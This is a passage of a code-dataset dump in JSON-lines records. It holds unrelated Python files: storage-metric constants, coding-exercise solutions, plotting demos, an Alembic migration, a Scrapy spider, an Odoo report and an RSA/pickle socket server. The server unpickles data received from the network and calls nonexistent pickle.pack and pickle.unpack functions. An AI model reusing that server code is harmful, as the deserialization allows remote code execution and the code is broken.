'FC Initiator'\nIB_INITIATOR_DESCRIPTION = 'IB Initiator'\nUNKNOWN_INITIATOR_DESCRIPTION = 'Unknown Initiator'\n\nOCEANSTOR_METRICS = {\n 'iops': '22',\n 'readIops': '25',\n 'writeIops': '28',\n 'throughput': '21',\n 'readThroughput': '23',\n 'writeThroughput': '26',\n 'responseTime': '370',\n 'ioSize': '228',\n 'readIoSize': '24',\n 'writeIoSize': '27',\n 'cacheHitRatio': '303',\n 'readCacheHitRatio': '93',\n 'writeCacheHitRatio': '95',\n}\n\nCONVERT_TO_MILLI_SECOND_LIST = [\n 'responseTime'\n]\n\nIOPS_DESCRIPTION = {\n \"unit\": \"IOPS\",\n \"description\": \"Input/output operations per second\"\n}\nREAD_IOPS_DESCRIPTION = {\n \"unit\": \"IOPS\",\n \"description\": \"Read input/output operations per second\"\n}\nWRITE_IOPS_DESCRIPTION = {\n \"unit\": \"IOPS\",\n \"description\": \"Write input/output operations per second\"\n}\nTHROUGHPUT_DESCRIPTION = {\n \"unit\": \"MB/s\",\n \"description\": \"Represents how much data is \"\n \"successfully transferred in MB/s\"\n}\nREAD_THROUGHPUT_DESCRIPTION = {\n \"unit\": \"MB/s\",\n \"description\": \"Represents how much data read is \"\n \"successfully transferred in MB/s\"\n}\nWRITE_THROUGHPUT_DESCRIPTION = {\n \"unit\": \"MB/s\",\n \"description\": \"Represents how much data write is \"\n \"successfully transferred in MB/s\"\n}\nRESPONSE_TIME_DESCRIPTION = {\n \"unit\": \"ms\",\n \"description\": \"Average time taken for an IO \"\n \"operation in ms\"\n}\nCACHE_HIT_RATIO_DESCRIPTION = {\n \"unit\": \"%\",\n \"description\": \"Percentage of io that are cache hits\"\n}\nREAD_CACHE_HIT_RATIO_DESCRIPTION = {\n \"unit\": \"%\",\n \"description\": \"Percentage of read ops that are cache hits\"\n}\nWRITE_CACHE_HIT_RATIO_DESCRIPTION = {\n \"unit\": \"%\",\n \"description\": \"Percentage of write ops that are cache hits\"\n}\nIO_SIZE_DESCRIPTION = {\n \"unit\": \"KB\",\n \"description\": \"The average size of IO requests in KB\"\n}\nREAD_IO_SIZE_DESCRIPTION = {\n \"unit\": \"KB\",\n \"description\": \"The average size of read IO requests in KB\"\n}\nWRITE_IO_SIZE_DESCRIPTION = {\n \"unit\": \"KB\",\n \"description\": \"The average size of write IO requests in KB\"\n}\nCPU_USAGE_DESCRIPTION = {\n \"unit\": \"%\",\n \"description\": \"Percentage of CPU usage\"\n}\nMEMORY_USAGE_DESCRIPTION = {\n \"unit\": \"%\",\n \"description\": \"Percentage of DISK memory usage in percentage\"\n}\nSERVICE_TIME = {\n \"unit\": 'ms',\n \"description\": \"Service time of the resource in ms\"\n}\nPOOL_CAP = {\n \"iops\": IOPS_DESCRIPTION,\n \"readIops\": READ_IOPS_DESCRIPTION,\n \"writeIops\": WRITE_IOPS_DESCRIPTION,\n \"throughput\": THROUGHPUT_DESCRIPTION,\n \"readThroughput\": READ_THROUGHPUT_DESCRIPTION,\n \"writeThroughput\": WRITE_THROUGHPUT_DESCRIPTION,\n \"responseTime\": RESPONSE_TIME_DESCRIPTION,\n}\nVOLUME_CAP = {\n \"iops\": IOPS_DESCRIPTION,\n \"readIops\": READ_IOPS_DESCRIPTION,\n \"writeIops\": WRITE_IOPS_DESCRIPTION,\n \"throughput\": THROUGHPUT_DESCRIPTION,\n \"readThroughput\": READ_THROUGHPUT_DESCRIPTION,\n \"writeThroughput\": WRITE_THROUGHPUT_DESCRIPTION,\n \"responseTime\": RESPONSE_TIME_DESCRIPTION,\n \"cacheHitRatio\": CACHE_HIT_RATIO_DESCRIPTION,\n \"readCacheHitRatio\": READ_CACHE_HIT_RATIO_DESCRIPTION,\n \"writeCacheHitRatio\": WRITE_CACHE_HIT_RATIO_DESCRIPTION,\n \"ioSize\": IO_SIZE_DESCRIPTION,\n \"readIoSize\": READ_IO_SIZE_DESCRIPTION,\n \"writeIoSize\": WRITE_IO_SIZE_DESCRIPTION,\n}\nCONTROLLER_CAP = {\n \"iops\": IOPS_DESCRIPTION,\n \"readIops\": READ_IOPS_DESCRIPTION,\n \"writeIops\": WRITE_IOPS_DESCRIPTION,\n \"throughput\": THROUGHPUT_DESCRIPTION,\n \"readThroughput\": READ_THROUGHPUT_DESCRIPTION,\n \"writeThroughput\": WRITE_THROUGHPUT_DESCRIPTION,\n \"responseTime\": RESPONSE_TIME_DESCRIPTION,\n}\nPORT_CAP = {\n \"iops\": IOPS_DESCRIPTION,\n \"readIops\": READ_IOPS_DESCRIPTION,\n \"writeIops\": WRITE_IOPS_DESCRIPTION,\n \"throughput\": THROUGHPUT_DESCRIPTION,\n \"readThroughput\": READ_THROUGHPUT_DESCRIPTION,\n \"writeThroughput\": WRITE_THROUGHPUT_DESCRIPTION,\n \"responseTime\": RESPONSE_TIME_DESCRIPTION,\n}\nDISK_CAP = {\n \"iops\": IOPS_DESCRIPTION,\n \"readIops\": READ_IOPS_DESCRIPTION,\n \"writeIops\": WRITE_IOPS_DESCRIPTION,\n \"throughput\": THROUGHPUT_DESCRIPTION,\n \"readThroughput\": READ_THROUGHPUT_DESCRIPTION,\n \"writeThroughput\": WRITE_THROUGHPUT_DESCRIPTION,\n \"responseTime\": RESPONSE_TIME_DESCRIPTION,\n}\n","repo_name":"sodafoundation/delfin","sub_path":"delfin/drivers/huawei/oceanstor/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"6"} +{"seq_id":"17035446074","text":"# 競輪のユニフォーム (paizaランク D 相当)\n# https://paiza.jp/works/mondai/forest_contest_002/forest_contest_002__d_keirin\n\nINPUT1 = \"\"\"\\\n2\n\"\"\"\nOUTPUT1 = \"\"\"\\\nblack\n\"\"\"\n\nINPUT2 = \"\"\"\\\n5\n\"\"\"\nOUTPUT2 =\"\"\"\\\nyellow\n\"\"\"\n\n'''\n# 解答例1\n# 入力\nn = int(input())\n\n# n に対応した色を color に代入\ncolor = \"\"\nif n == 1:\n color = \"white\"\nelif n == 2:\n color = \"black\"\nelif n == 3:\n color = \"red\"\nelif n == 4:\n color = \"blue\"\nelif n == 5:\n color = \"yellow\"\nelif n == 6:\n color = \"green\"\nelif n == 7:\n color = \"orange\"\nelif n == 8:\n color = \"pink\"\nelif n == 9:\n color = \"purple\"\n\n# color を出力\nprint(color)\n'''\n\n# 解答例2\n# 色の設定\ncolors = [\"white\", \"black\", \"red\", \"blue\", \"yellow\", \"green\", \"orange\", \"pink\", \"purple\"]\n\n# なるべく少ない入力で配列を作るなら\n# split メソッド\n# colors = \"white black red blue yellow green orange pink purple\".split()\n\n# 入力\nn = int(input())\n\n# n に対応した色を出力\nprint(colors[n - 1])\n\n\n'''\nn が\n1のとき、white\n2のとき、black\n3のとき、red\n4のとき、blue\n5のとき、yellow\n6のとき、green\n7のとき、orange\n8のとき、pink\n9のとき、purple\n'''","repo_name":"atsushi0919/paiza_workbook","sub_path":"forest_contest/02/02-001_d_keirin.py","file_name":"02-001_d_keirin.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26363553650","text":"# Calificaciones alfabéticas a numéricas\r\na = 4.0\r\na_minus = 3.7\r\nb_plus = 3.3\r\nb = 3.0\r\nb_minus = 2.7\r\nc_plus = 2.3\r\nc = 2.0\r\nc_minus = 1.7\r\nd_plus = 1.3\r\nd = 1.0\r\nf = 0\r\nno_valido = -1\r\n\r\nletra = input(\"Introduce una calificación alfabética: \")\r\nletra = letra.upper()\r\nif letra == \"A+\" or letra == \"A\":\r\n notanum = a\r\nelif letra == \"A-\":\r\n notanum = a_minus\r\nelif letra == \"B+\":\r\n notanum = b_plus\r\nelif letra == \"B\":\r\n notanum = b\r\nelif letra == \"B-\":\r\n notanum = b_minus\r\nelif letra == \"C+\":\r\n notanum = c_plus\r\nelif letra == \"C\":\r\n notanum = c\r\nelif letra == \"C-\":\r\n notanum = c_minus\r\nelif letra == \"D+\":\r\n notanum = d_plus\r\nelif letra == \"D\":\r\n notanum = d\r\nelif letra == \"F\":\r\n notanum = f\r\nelse:\r\n notanum = no_valido\r\n\r\nif notanum == no_valido:\r\n print(\"No es una calificación académica.\")\r\nelse:\r\n print(\"Es un \" + str(notanum))\r\n","repo_name":"DBidaux/Pycharm-Ejercicios","sub_path":"Ejercicios/Ejercicios libro pdf/Ejercicios Tema 2/Ejercicio 2.51.py","file_name":"Ejercicio 2.51.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29578450590","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nhttps://jakevdp.github.io/PythonDataScienceHandbook/04.04-density-and-contour-plots.html\r\nCreated on Fri Oct 26 13:48:35 2018\r\n\r\n@author: Akitaka\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nplt.style.use('seaborn-white')\r\nimport numpy as np\r\n\r\n# Visualizing a Three-Dimensional Function\r\ndef f(x, y):\r\n return np.sin(x) ** 10 + np.cos(10 + y * x) * np.cos(x)\r\n\r\nx = np.linspace(0, 5, 50)\r\ny = np.linspace(0, 5, 40)\r\nX, Y = np.meshgrid(x, y)\r\nZ = f(X, Y)\r\nplt.xkcd()\r\nplt.contour(X, Y, Z, colors='black');\r\n#%%\r\nplt.xkcd()\r\nplt.contour(X, Y, Z, 20, cmap='RdGy');\r\n\r\n#%%\r\nplt.contourf(X, Y, Z, 20, cmap='RdGy')\r\nplt.colorbar();\r\n\r\n#%%\r\nplt.imshow(Z, extent=[0, 5, 0, 5], origin='lower',\r\n cmap='RdGy')\r\nplt.colorbar()\r\nplt.axis(aspect='image');\r\n\r\n#%%\r\ncontours = plt.contour(X, Y, Z, 3, colors='black')\r\nplt.clabel(contours, inline=True, fontsize=8)\r\n\r\nplt.imshow(Z, extent=[0, 5, 0, 5], origin='lower',\r\n cmap='RdGy', alpha=0.5)\r\nplt.colorbar();","repo_name":"nakanishi-akitaka/python2018_backup","sub_path":"1026/04.04_density_and_contour_plots.py","file_name":"04.04_density_and_contour_plots.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"44333501511","text":"\"\"\"Create Pricelist and Item tables\n\nRevision ID: d7a46768014a\nRevises: \nCreate Date: 2022-11-08 19:42:40.141637\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd7a46768014a'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('pricelists',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('items',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.Column('price', sa.Integer(), nullable=False),\n sa.Column('pricelist_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['pricelist_id'], ['pricelists.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_items_pricelist_id'), 'items', ['pricelist_id'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_items_pricelist_id'), table_name='items')\n op.drop_table('items')\n op.drop_table('pricelists')\n # ### end Alembic commands ###\n","repo_name":"matthieuchoplin/brit-assessment","sub_path":"src/migrations/versions/d7a46768014a_create_pricelist_and_item_tables.py","file_name":"d7a46768014a_create_pricelist_and_item_tables.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7218853166","text":"from multiprocessing import freeze_support\nimport pickle\nimport socketserver\nimport rsa\nimport core\nimport threading\n\n\nclass MyTCPHandler(socketserver.BaseRequestHandler):\n def __init__(self, request, client_address, server):\n super().__init__(request, client_address, server)\n\n def recv(self):\n size_byte = self.request.recv(4)\n size = pickle.unpack('i', size_byte)[0]\n # print(size)\n if size == 256:\n crypt_byte_msg = self.request.recv(256)\n msg = rsa.decrypt(crypt_byte_msg, self.private_key)\n return pickle.loads(msg)\n elif size == 257:\n package_number = self.request.recv(4)\n package_number = pickle.unpack('i', package_number)[0]\n result = b''\n for i in range(package_number):\n crypt_byte_msg = self.request.recv(256)\n msg = rsa.decrypt(crypt_byte_msg, self.private_key)\n result = result + msg\n return pickle.loads(result)\n\n def send(self, msg):\n msg_byte = pickle.dumps(msg)\n if len(msg_byte) > 245:\n self.request.sendall(pickle.pack('i', 257))\n package_number = (len(msg_byte) // 245) + 1\n self.request.sendall(pickle.pack('i', package_number))\n for i in range(package_number):\n msg_to_send = msg_byte[i * 245:i * 245 + 245]\n crypt_byte_msg = rsa.encrypt(msg_to_send, self.key_rec)\n self.request.sendall(crypt_byte_msg)\n elif len(msg_byte) <= 245:\n crypt_byte_msg = rsa.encrypt(msg_byte, self.key_rec)\n # pkg\n self.request.sendall(pickle.pack('i', 256))\n self.request.sendall(crypt_byte_msg)\n\n def login(self):\n hash_get = self.recv()\n if core.test_hash(hash_get[0], hash_get[1]):\n self.user = hash_get[0]\n print(\"test pass\")\n self.send(True)\n else:\n self.send(False)\n\n def get_cell(self):\n cell = self.recv()\n for num in cell:\n length = len(cell[num][1])\n if (cell[num][0] != '无') or (length > 0):\n if num in work_book.sheet:\n lock.acquire()\n work_book.sheet[num] = cell[num]\n lock.release()\n else:\n lock.acquire()\n work_book.sheet[num] = []\n work_book.sheet[num] = cell[num]\n lock.release()\n \n\n def reply(self):\n number = self.recv()\n if number in work_book.sheet:\n cell = work_book.sheet[number]\n self.send(cell)\n else:\n print('新号码')\n self.send(None)\n\n def reply_operate(self, operate):\n if operate is None:\n print(\"none\")\n elif operate == 1:\n self.get_cell()\n elif operate == 2:\n self.reply()\n\n def server_operate(self, operate):\n if operate is None:\n print('none')\n elif operate == 3:\n file = self.recv()\n work_book.xl_write(file)\n elif operate == 4:\n file = self.recv()\n lock.acquire()\n work_book.xl_read(file)\n lock.release()\n elif operate == 5:\n file = self.recv()\n day = self.recv()\n temp_book = core.Book()\n temp_book.sheet = work_book.search_day(day)\n temp_book.xl_write(file)\n elif operate == 6:\n user = self.recv()\n password = self.recv()\n core.add_user(user, password)\n elif operate == 7:\n user = self.recv()\n core.del_user(user)\n\n def setup(self):\n lock.acquire()\n work_book.record_read()\n lock.release()\n print(\"before handle,连接建立:\", self.client_address)\n (self.pub_key, self.private_key) = rsa.newkeys(2048, poolsize=2)\n self.request.sendall(pickle.dumps(self.pub_key))\n key = self.request.recv(309)\n self.key_rec = pickle.loads(key)\n print(self.key_rec)\n try:\n self.login()\n except ConnectionError as e:\n print('登录失败')\n self.server.shutdown_request(self.request)\n self.server.close_request(self.request)\n print(e)\n\n def handle(self):\n try:\n while True:\n operate = self.recv()\n if self.client_address[0] == host[0]:\n self.server_operate(operate)\n self.reply_operate(operate)\n else:\n self.reply_operate(operate)\n print(operate)\n work_book.record_write()\n except Exception as e:\n print(self.client_address, \"连接断开\", e)\n finally:\n work_book.record_write()\n self.server.shutdown_request(self.request)\n self.server.close_request(self.request)\n\n def finish(self):\n work_book.record_write()\n\n\nif __name__ == '__main__':\n freeze_support()\n lock = threading.Lock()\n work_book = core.Book()\n host = core.get_host()\n server = socketserver.ThreadingTCPServer(host, MyTCPHandler) # 多线程版\n server.serve_forever()\n","repo_name":"jerry-harm/simplecms","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"9293900451","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def deleteDuplicates(self, head):\n if not head or not head.next:\n return None\n\n curr = head\n while curr and curr.next:\n if curr.val == curr.next.val:\n curr.next = curr.next.next\n else:\n curr = curr.next\n\n return head","repo_name":"rioshen/Problems","sub_path":"leetcode/python/remove_duplicates_from_sorted_list.py","file_name":"remove_duplicates_from_sorted_list.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"2995628559","text":"# -*- coding: utf-8 -*-\n# -*- coding: utf-8 -*-\n\nfrom odoo import api, models, fields\nfrom odoo.tools.float_utils import float_round as round\nfrom openerp.exceptions import ValidationError, Warning\nfrom datetime import timedelta, date, datetime, time\nfrom num2words import num2words\n\nimport locale\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nclass ReportStockPickingRefrigerated(models.AbstractModel):\n _name = \"report.veggie.roadmap_report_refrigerated\"\n \n def _all_products_for_clients(self, date):\n categoria_refrigerados = []\n main_categ = None\n all_date = {}\n if len(date) > 1:\n for rec in date:\n for line in rec.sale_id:\n for order_line in line.order_line:\n if order_line.product_id.categ_id.name == 'Todos':\n continue\n if order_line.product_id.categ_id.parent_id.name:\n main_categ = order_line.product_id.categ_id.parent_id.name if order_line.product_id.categ_id.parent_id else None\n categ = order_line.product_id.categ_id.name\n order_category = order_line.product_id.categ_id.order_report\n product_name = order_line.product_id.description_pickingout\n quantity_product = order_line.product_uom_qty\n if len(product_name) > 13:\n product_name = product_name[:13]\n line_data = {\n 'categ': categ,\n 'main_categ': main_categ,\n 'order_category': order_category,\n 'total_products': int(quantity_product),\n 'data': [{\n 'product_name': product_name,\n 'quantity_product': int(quantity_product),\n 'order_product':order_line.product_id.order_report,\n\n }]\n }\n else:\n raise ValidationError(f'El producto {order_line.product_id.description_pickingout}, no tiene categoria padre, referencia {rec.name}!! ') \n try:\n if main_categ == 'Refrigerados':\n \n if categoria_refrigerados:\n categoria_refrigerados = self.filterCategory(categoria_refrigerados,line_data)\n \n else:\n categoria_refrigerados.append(line_data)\n \n categoria_refrigerados = sorted(\n categoria_refrigerados, key=lambda k: k['order_category'])\n for sorted_produc in categoria_refrigerados:\n sorted_produc['data'] = sorted(sorted_produc['data'], key=lambda k: k['order_product'])\n \n del line_data\n except Exception as e:\n _logger.debug(e)\n raise ValidationError('Verifique que todos los productos tengas categoria Padre!!')\n\n \n date_order = rec.scheduled_date\n all_date = {\n 'date_order': date_order,\n 'refrigerados': categoria_refrigerados,\n }\n del categoria_refrigerados\n \n return all_date\n\n @api.model\n def _get_report_values(self, docids, data=None):\n try:\n locale.setlocale(locale.LC_TIME, 'es_AR.UTF-8')\n except Exception as e:\n raise ValidationError(e)\n \n total_parent = False\n total_users = []\n\n find_stock_pickig = self.env['stock.picking'].search([\n ('id', 'in', docids)\n ])\n if len(find_stock_pickig) > 1:\n \n total_parent = self._all_products_for_clients(find_stock_pickig)\n\n for rec in find_stock_pickig:\n\n refrigerados = []\n\n if rec.sale_id:\n for line in rec.sale_id:\n refrigerados = []\n main_categ = None\n code = None\n date_order = rec.scheduled_date\n for order_line in line.order_line:\n if order_line.product_id.categ_id.name == 'Todos':\n continue\n if order_line.product_id.categ_id:\n if order_line.product_id.categ_id.parent_id:\n main_categ = order_line.product_id.categ_id.parent_id.name if order_line.product_id.categ_id.parent_id else None\n categ = order_line.product_id.categ_id.name\n order_category = order_line.product_id.categ_id.order_report\n product_name = order_line.product_id.description_pickingout\n quantity_product = order_line.product_uom_qty\n qr = str(line.name) + 'R'\n if len(product_name) > 13:\n product_name = product_name[:13]\n if rec.order and rec.rute:\n code = f'{rec.rute}{rec.order}'\n elif rec.order and not rec.rute:\n code = f'{rec.order}'\n elif rec.rute and not rec.order:\n code = f'{rec.rute}'\n line_data = {\n 'categ': categ,\n 'main_categ': main_categ,\n 'url': f'https://chart.googleapis.com/chart?chs=150x150&cht=qr&chl={qr}',\n 'order_category': order_category,\n 'total_products': int(quantity_product),\n 'data': [{\n 'order_product':order_line.product_id.order_report,\n 'product_name': product_name,\n 'quantity_product': int(quantity_product),\n }]\n }\n else:\n raise ValidationError(f'El producto {order_line.product_id.description_pickingout}, no tiene categoria padre, referencia {rec.name}!! ') \n if main_categ == 'Refrigerados':\n if refrigerados:\n refrigerados = self.filterCategory(refrigerados,line_data)\n else:\n refrigerados.append(line_data) \n refrigerados = sorted(refrigerados, key=lambda k: k['order_category'])\n for sorted_produc in refrigerados:\n sorted_produc['data'] = sorted(sorted_produc['data'], key=lambda k: k['order_product'])\n \n line_data = None\n\n street = line.partner_id.street if line.partner_id.street is not False else ''\n city = line.partner_id.city if line.partner_id.city is not False else ''\n date_order = rec.scheduled_date\n ruta_name = rec.rute if rec.rute else ''\n order_name = rec.order if rec.order != 0 else ''\n ruta = f'{ruta_name}{order_name}'\n stock_name_count = len(rec.origin)\n stock_name_count = stock_name_count - 3 \n stock_name= rec.origin[:stock_name_count]\n code_name = rec.origin[stock_name_count:] + \"R\"\n categoria = main_categ[:-1]\n categoria = 'REFRIGERADO'\n \n \n date = {\n 'categoria':categoria,\n 'date_order': date_order,\n 'cliente': line.partner_id.name,\n 'stock_name':stock_name,\n 'stock_name_cort':code_name,\n 'nombre_fant': line.partner_id.ref,\n 'dir': '%s %s' % (street, city),\n 'subtotal': line.amount_untaxed,\n 'total': line.amount_total,\n 'deuda': line.get_deuda_total(line.partner_id),\n 'refrigerados': refrigerados,\n 'code': code,\n 'qr_prueba': f'https://chart.googleapis.com/chart?chs=150x150&cht=qr&chl={qr}',\n 'ruta':ruta,\n }\n\n total_users.append(date)\n rec.refrigerated_roadmap = True \n \n list_so = {\n 'total_users': total_users,\n 'total_parent': total_parent,\n }\n _logger.debug('lleeegaaa')\n _logger.debug(list_so)\n docargs = {\n 'doc_ids': docids,\n 'doc_model': 'stock.picking',\n 'docs': list_so,\n }\n del list_so\n del refrigerados\n\n return docargs\n\n def filterCategory(self, categ, categ_new):\n\n exist = categ_new['categ'] in [line['categ'] for line in categ]\n\n if exist == False:\n categ.append(categ_new)\n else:\n data_position = next((index for (index, d) in enumerate(categ) if d[\"categ\"] == categ_new['categ']), None)\n data_position_product = next((index for (index, d) in enumerate(categ[data_position]['data']) if d[\"product_name\"] == categ_new['data'][0]['product_name']), None)\n if data_position_product != None:\n categ[data_position]['total_products'] += categ_new['total_products']\n categ[data_position]['data'][data_position_product]['quantity_product'] += categ_new['data'][0]['quantity_product']\n else:\n categ[data_position]['total_products'] += categ_new['total_products']\n categ[data_position]['data'].append(categ_new['data'][0])\n\n return categ\n \n ","repo_name":"Paulamoser/TiendaVeggieV14","sub_path":"veggie/models/refrigerated.py","file_name":"refrigerated.py","file_ext":"py","file_size_in_byte":10756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71049049149","text":"# -*- coding: utf-8 -*-\nfrom scrapy.selector import Selector\nfrom scrapy.http import HtmlResponse\n\n\nclass SelectorSpider(scrapy.Spider):\n name = 'selector_spider'\n allowed_domains = ['example.com']\n start_urls = ['https://doc.scrapy.org/en/latest/_static/selectors-sample1.html']\n\n def parse(self, response):\n #body = '<html><body><span>good</span></body></html>'\n #Selector(text = body).xpath('//span/text()').extract()\n\n #response = HtmlResponse(url='http://example.com', body=body)\n #Selector(response=response).xpath('//span/text()').extract()\n\n #response.selector.xpath('//span/text()').extract()\n\n # <html>\n # <head>\n # <base href='http://example.com/' />\n # <title>Example website\n # \n # \n # \n # \n # \n response.xpath('//title/text()') #response.css('title:text')\n response.css('img').xpath('@src').extract()\n response.xpath('//title/text()').extract()\n response.xpath('//div[@id=\"images\"]/a/text()').extract_first()\n response.xpath('//div[@id=\"not_exist\"]/a/text()').extract_first() #return None\n response.xpath('//div[@id=\"not-exist\"]/text()').extract_first(default='not-found') # return 'not-found'\n response.xpath('//base/@href').extract() #response.css('base::attr(href)').extract()\n response.xpath('a[contains(@href, \"image\")]/@href').extract()\n response.css('a[href*=image]::attr(href)').extract()\n response.xpath('//a[contains(@href, \"image\")]/img/@src')\n response.css('a[href*=image] img::attr(src)').extract()\n response.xpath('//a[contains(@href, \"image\")]/text()').re('Name:\\s*(.*)') #used to extract image names\n response.xpath('//div[@id=$val]/a/text()', val='images').extract_first()\n response.xpath('//div[count(a)=$cnt]/@id', cnt=5).extract_first()\n response.xpath('//li[re:test(@class, \"item-\\d$\")]//@href').extract()\n\n sel = Selector(text='Click here to go to the Next Page')\n sel.xpath('//a[1]').extract()\n sel.xpath('//a[contains(.//text(), \"Next Page\")]').extract()\n pass\n","repo_name":"xxg2/pythonl","sub_path":"scrapy/totorial/totorial/spiders/selector_spider.py","file_name":"selector_spider.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38895238685","text":"#length of English alphabet is equal to 26\r\nfrom collections import OrderedDict\r\nfrom matplotlib import pyplot as plt\r\n#matplotlib.pyplot ile bar plot yapıldı.\r\n#v5 debugging yapılacak\r\n#v6 görsel sadelik için düzenleme yapılacak\r\nclass HarfAnalizMuhendisi():\r\n harfSozluguKucuk_count = {'a': 0, 'b': 0, 'c': 0, 'd': 0,\r\n 'e': 0, 'f': 0, 'g': 0, 'h': 0,\r\n 'i': 0, 'j': 0, 'k': 0, 'l': 0,\r\n 'm': 0, 'n': 0, 'o': 0, 'p': 0, 'q': 0,\r\n 'r': 0, 's': 0,\r\n 't': 0, 'u': 0, 'v': 0,\r\n 'w': 0, 'x': 0, 'y': 0, 'z': 0}\r\n harfSozluguKucuk_count = OrderedDict(harfSozluguKucuk_count)\r\n harfSozluguBuyuk_count = {'A': 0, 'B': 0, 'C': 0, 'D': 0,\r\n 'E': 0, 'F': 0, 'G': 0, 'H': 0, 'I': 0, 'J': 0, 'K': 0,\r\n 'L': 0, 'M': 0, 'N': 0, 'O': 0,\r\n 'P': 0, 'Q': 0, 'R': 0, 'S': 0, 'T': 0, 'U': 0, 'V': 0,\r\n 'W': 0, 'X': 0, 'Y': 0, \"Z\": 0}\r\n harfSozluguBuyuk_count = OrderedDict(harfSozluguBuyuk_count)\r\n kucukHarfler = list(harfSozluguKucuk_count.keys())\r\n buyukHarfler = list(harfSozluguBuyuk_count.keys())\r\n def __init__(self,string):\r\n self.string=string #analiz gerçekleştirilecek string\r\n def gercekle_kucukHarfAnalizi(self):\r\n for k in self.kucukHarfler:\r\n self.harfSozluguKucuk_count[k] = self.string.count(k)\r\n def gercekle_buyukHarfAnalizi(self):\r\n for k in self.buyukHarfler:\r\n self.harfSozluguBuyuk_count[k] =self.string.count(k)\r\n def gercekle_butunHarfAnalizi(self):\r\n for k in self.kucukHarfler:\r\n self.harfSozluguKucuk_count[k] = self.string.count(k)\r\n for l in self.buyukHarfler:\r\n self.harfSozluguBuyuk_count[l] = self.string.count(l)\r\n def gosterBuyukHarfAnalizi(self):\r\n for key, value in self.harfSozluguBuyuk_count.items():\r\n print(key, \"-->\", value)\r\n def gosterKucukHarfAnalizi(self):\r\n for key, value in self.harfSozluguKucuk_count.items():\r\n print(key, \"-->\", value)\r\n def gosterString(self):\r\n print(self.string)\r\n def gosterGrafik_kucukHarf(self):\r\n fig = plt.figure()\r\n ax = fig.add_axes([0, 0, 1, 1])\r\n values = self.harfSozluguKucuk_count.values()\r\n ax.bar(self.kucukHarfler,values)\r\n plt.show()\r\n def gosterGrafik_buyukHarf(self):\r\n fig = plt.figure()\r\n ax = fig.add_axes([0, 0, 1, 1])\r\n values = self.harfSozluguBuyuk_count.values()\r\n ax.bar(self.buyukHarfler, values)\r\n plt.show()\r\n def __str__(self):\r\n return \"Constructorda girilen stringe harf analizi yapan ve plot ile ifade eden bir Sınıf\" \\\r\n \"tan türetilen obje\"\r\nif __name__ == '__main__':\r\n # 1=kucukharf analizi 2=buyukharf analizi\r\n # 3=butunHarf analizi\r\n # 4=goster kucukharf analizi 5=buyukharfAnalizi\r\n # 6=goster String\r\n # 7=cıkıs\r\n # 8=plot kucuk harf , 9=plot buyuk harf\r\n CreatorOfPython = HarfAnalizMuhendisi(\"If you're talking about Java in particular, Python \" \\\r\n \"is about the best fit you can get amongst all the other languages. \" \\\r\n \"Yet the funny thing is, from a language point of view, JavaScript has a lot in c\" \\\r\n \"ommon with Python, but it is sort of a restricted subset\")\r\n while(True):\r\n print(\"0=Class hakkında bilgi...\\n\"\r\n \"1=kucukharf analizi 2=buyukharf analizi\\n\"\\\r\n \"3=butunHarf analizi\\n\"\\\r\n \"4=goster kucukharf analizi 5=buyukharfAnalizi\\n\"\\\r\n \"6=goster String\\n\"\\\r\n \"7=cıkıs\\n\"\r\n \"8=kucukHarf bar plot\\n\"\r\n \"9=buyukHarf bar plot\")\r\n selection=int(input())\r\n if selection == 1:\r\n CreatorOfPython.gercekle_kucukHarfAnalizi()\r\n print(\"Kucuk harf analizi tamamlandı...\")\r\n continue\r\n elif selection == 2:\r\n CreatorOfPython.gercekle_buyukHarfAnalizi()\r\n print(\"Buyuk harf analizi tamamlandı...\")\r\n continue\r\n elif selection == 3:\r\n CreatorOfPython.gercekle_butunHarfAnalizi()\r\n print(\"Butun harf analizi tamamlandı...\")\r\n continue\r\n elif selection == 4:\r\n CreatorOfPython.gosterKucukHarfAnalizi()\r\n continue\r\n elif selection == 5:\r\n CreatorOfPython.gosterBuyukHarfAnalizi()\r\n continue\r\n elif selection == 6:\r\n CreatorOfPython.gosterString()\r\n continue\r\n elif selection == 7:\r\n print(\"Programdan çıkılıyor...\")\r\n break\r\n elif selection == 8:\r\n CreatorOfPython.gosterGrafik_kucukHarf()\r\n continue\r\n elif selection == 9:\r\n 